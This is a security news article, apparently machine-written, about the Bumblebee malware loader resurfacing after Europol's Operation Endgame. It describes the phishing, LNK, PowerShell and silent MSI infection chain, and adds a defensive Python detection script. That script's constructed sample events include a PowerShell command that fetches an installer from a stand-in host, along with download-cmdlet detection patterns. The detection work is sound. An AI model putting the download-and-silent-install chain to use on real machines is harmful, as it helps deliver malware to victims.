Today's cybersecurity headlines are brought to you by ThreatPerspective


Ethical Hacking News

Bumblebee Malware Resurfaces After Europol's Operation Endgame Disruption



Bumblebee malware has resurfaced after a nearly four-month hiatus, raising concerns about its resurgence and the threat it poses to victim networks. In a recent report, Netskope researchers documented a new Bumblebee attack chain that uses phishing emails, malicious MSI files, and PowerShell scripts. The article examines the tactics used by Bumblebee, including its signature internal DLL naming scheme and an RC4 key containing the string "NEW_BLACK", providing an in-depth look at this evolving malware threat.

  • Bumblebee malware has returned after a temporary silence following Operation Endgame's disruption in May.
  • The latest resurgence is marked by similarities with past variants, including retention of the internal DLL naming scheme and configuration extraction mechanisms.
  • New campaign IDs "msi" and "lnk001" are used in recent attacks.
  • Netskope notes the RC4 key includes the string "NEW_BLACK" for decryption.



Europol's Operation Endgame, a coordinated international law enforcement effort, disrupted over a hundred servers supporting various malware loader operations in May. Among the targeted loaders were IcedID, Pikabot, Trickbot, Bumblebee, Smokeloader, and SystemBC. The operation seized the servers and dismantled the infrastructure, and it appeared to silence Bumblebee, at least temporarily.

However, recent observations by researchers at cybersecurity company Netskope indicate that Bumblebee malware has returned, sparking concerns about its resurgence. As a replacement for the BazarLoader backdoor in 2022, Bumblebee provided ransomware threat actors with access to victim networks via phishing, malvertising, and SEO poisoning techniques.

To achieve infection, Bumblebee relies on tactics such as phishing emails that lure victims into downloading malicious ZIP archives. The archives contain a Windows shortcut file named "Report-41952.lnk", which launches a PowerShell script that downloads a malicious .MSI file, disguised as a legitimate NVIDIA driver update or a Midjourney installer, from a remote server.

The MSI file is then executed silently with msiexec.exe and the /qn option (quiet, no user interface), so the installation runs without any user interaction. The malware uses the SelfReg table within the MSI structure to have msiexec.exe load its DLL into its own address space and invoke the DLL's DllRegisterServer export, which starts the unpacking process.
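The delivery chain described above (a shortcut launching a PowerShell download, followed by a silent msiexec.exe install of a package dropped in a user-writable location) leaves a recognisable trail in process-creation telemetry. The following detection logic is an added example and is not Netskope's code or part of the original report; the event schema (Sysmon Event ID 1 style fields Image, ParentImage, CommandLine), the sample events and the paths in them are constructed for illustration.

```python
"""Flag process-creation events matching a shortcut-to-PowerShell-to-silent-MSI
delivery chain. Added example with a constructed Sysmon-like event schema; the
sample events below are not real telemetry."""
import re
from typing import Dict, List

# Constructed sample events (not captured data). Event 2 is the Windows
# Installer service starting normally; event 3 is a vendor installer running a
# silent install from Program Files. Neither should be flagged.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'powershell.exe -w hidden -c "Invoke-WebRequest -Uri '
                    r'http://example.invalid/nvidia_update.msi -OutFile $env:TEMP\update.msi"'},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"msiexec.exe /i C:\Users\alice\AppData\Local\Temp\update.msi /qn"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r"msiexec.exe /V"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Program Files\SomeVendor\setup.exe",
     "CommandLine": r'msiexec.exe /i "C:\Program Files\SomeVendor\app.msi" /qn'},
]

# PowerShell download primitives commonly seen in loader scripts.
DOWNLOAD_CMDLETS = re.compile(
    r"(?i)\b(?:invoke-webrequest|iwr|invoke-restmethod|irm|downloadfile|"
    r"downloadstring|start-bitstransfer|curl|wget)\b")
# msiexec quiet switches (/qn, /qb, /q, /quiet; also accepted with a dash).
QUIET_SWITCH = re.compile(r"(?i)(?:^|\s)[/-](?:qn|qb|q|quiet)\b")
# Package paths a legitimate software deployment rarely uses.
USER_WRITABLE = re.compile(
    r"(?i)\\users\\[^\\\"']+\\(?:appdata|downloads|desktop|documents)\\"
    r"|\\temp\\|\\public\\|\\programdata\\|https?://")
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe")


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return one hit per (event, rule) pair, in event order."""
    hits: List[Dict[str, object]] = []
    for idx, ev in enumerate(events):
        image = _basename(ev.get("Image", ""))
        parent = _basename(ev.get("ParentImage", ""))
        cmd = ev.get("CommandLine", "")

        # A double-clicked .lnk is launched by explorer.exe, so PowerShell with a
        # download primitive directly under explorer.exe is the shortcut stage.
        if image in ("powershell.exe", "pwsh.exe") and parent == "explorer.exe" \
                and DOWNLOAD_CMDLETS.search(cmd):
            hits.append({"index": idx, "rule": "shortcut_powershell_download"})

        # Silent installs are normal for deployment tools; the suspicious part is
        # the package location and the process that asked for the install.
        if image == "msiexec.exe" and QUIET_SWITCH.search(cmd):
            if USER_WRITABLE.search(cmd):
                hits.append({"index": idx, "rule": "silent_msi_from_user_path"})
            if parent in SCRIPT_HOSTS:
                hits.append({"index": idx, "rule": "silent_msi_from_script_host"})
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(f"event {hit['index']}: {hit['rule']}")
```

Run against the constructed events, the PowerShell download and the msiexec.exe launch from %TEMP% are each flagged, while the Installer service start and the vendor's silent install from Program Files are not. In production, the parent-process rule is the more robust of the two msiexec checks, since path allow-lists vary by environment.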

Netskope notes that the Bumblebee payload retains the signature internal DLL and exported-function naming scheme, as well as the configuration extraction mechanism, seen in past variants. In recent attacks, the RC4 key used to decrypt its configuration includes the string "NEW_BLACK". Additionally, two campaign IDs are used: "msi" and "lnk001".

While Netskope did not provide further information on the dropped payloads or the scale of this latest Bumblebee campaign, this report serves as a warning of early signs of Bumblebee's possible resurgence.

For those looking for more details about the current situation with Bumblebee malware, the complete list of indicators of compromise is available on a GitHub repository. This article provides in-depth coverage of the recent developments surrounding Bumblebee and its implications for cybersecurity experts and individuals alike.

Related Information:

  • https://www.bleepingcomputer.com/news/security/bumblebee-malware-returns-after-recent-law-enforcement-disruption/

  • https://www.infosecurity-magazine.com/news/possible-bumblebee-resurgence/

  • https://darktrace.com/blog/pikabot-malware-battling-a-fast-moving-loader-malware-in-the-wild

  • https://www.zscaler.com/blogs/security-research/technical-analysis-pikabot

  • https://unit42.paloaltonetworks.com/bazarloader-network-reconnaissance/

  • https://unit42.paloaltonetworks.com/bazarloader-malware/


  • Published: Mon Oct 21 15:57:55 2024 by llama3.2 3B Q4_K_M



© Ethical Hacking News. All rights reserved.